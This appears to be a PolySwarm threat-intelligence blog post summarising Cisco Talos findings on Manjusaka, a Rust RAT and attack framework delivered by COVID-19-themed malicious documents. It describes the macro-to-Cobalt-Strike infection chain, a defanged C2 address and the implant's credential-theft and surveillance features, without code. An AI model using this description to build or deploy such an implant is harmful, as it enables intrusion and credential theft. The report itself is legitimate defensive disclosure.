Cisco Talos recently reported on a campaign leveraging Manjusaka, a new attack framework being used in the wild that is advertised as an alternative to Cobalt Strike or Sliver.
- Manjusaka is an attack framework similar to Cobalt Strike or Sliver.
- Manjusaka implants are written in Rust, with variants for both Windows and Linux.
- Manjusaka’s C2 server is available on GitHub.
- In a recent campaign, threat actors used maldocs with COVID-19-related lures to deliver Manjusaka.
Manjusaka, which means “cow flower” in Chinese, is the name of a new attack framework being advertised as an alternative to Cobalt Strike or Sliver. Researchers at Cisco Talos assess Manjusaka has the potential for widespread use across the threat landscape.
Manjusaka RAT implants are written in Rust and target Windows and Linux systems. The C2 is written in GoLang, with a Simplified Chinese user interface. The Manjusaka C2 executable is a fully functional C2 ELF binary. Cisco Talos also discovered an EXE version of the implant. Researchers were able to generate implants by specifying configurations while analyzing the C2.
Cisco Talos discovered a maldoc campaign, using COVID-19-related documents as a lure to drop Cobalt Strike beacons to victim endpoints. They observed the same threat actor using Cobalt Strike beacons and Manjusaka implants. The campaign, which targeted certain regions within China, had few targets and was active since around June 2022.
The maldoc contains a VBA macro that executes rundll32.exe and injects Metasploit shellcode to download and execute stage 2. Stage 2 is another shellcode containing an XOR encoded Cobalt Strike executable and shellcode used to decode and reflectively load a Cobalt Strike beacon. The Cobalt Strike beacon is executed, and reflectively loads itself into process memory.
The sample Cisco Talos analyzed made HTTP requests to http://39.104.90[.]45/global/favicon.png, which leverages a fixed session cookie defined by the sample. The cookie is base64 encoded and contains a compressed copy of binary data, including ransom bytes and system information used to register the infected machine with the C2.
Manjusaka RAT allows threat actors to execute arbitrary commands, get file information including creation time and file index, obtain network configuration information, collect browser credentials for Chromium-based browsers, collect WiFi SSID information, obtain Navicat credentials, take screenshots, obtain detailed system information, and activate the file management module.
System information collected by the Windows variant includes system memory global information, processor power, WMI temperature readings, network interface names, Process and System times, process module names, disk drive information, network account names, and Windows build and version numbers. File management capabilities include file enumeration, creating directories, setting the current working directory, obtaining full file paths, deleting files and removing directories, moving files, and reading and writing file data.
The Linux ELF variant operates similarly to the Windows version but collects the following system-specific information: global system information, system memory information, system uptime and idle time, OS identification, Kernel activity information, CPU information, temperature information, network interface information, device mount, and file system information, and user account information. The file management module is equivalent to the Windows version.
Cisco Talos discovered a copy of the Manjusaka C2 server binary on GitHub and noted it can be used to monitor and administer a victim machine and generate the Rust implants as payloads. The C2 server and admin panel use the Gin Web Framework to issue commands to the implants and stagers. Cisco Talos noted the threat actor using Manjusaka in this campaign does not appear to be associated with the developer of Manjusaka.
PolySwarm has multiple samples associated with the Manjusaka framework.
You can use the following CLI command to search for all Manjusaka samples in our portal:
$ polyswarm link list -f Manjusaka
Don’t have a PolySwarm account? Go here to sign up for a free Community plan or to subscribe.
Contact us at firstname.lastname@example.org | Check out our blog | Subscribe to our reports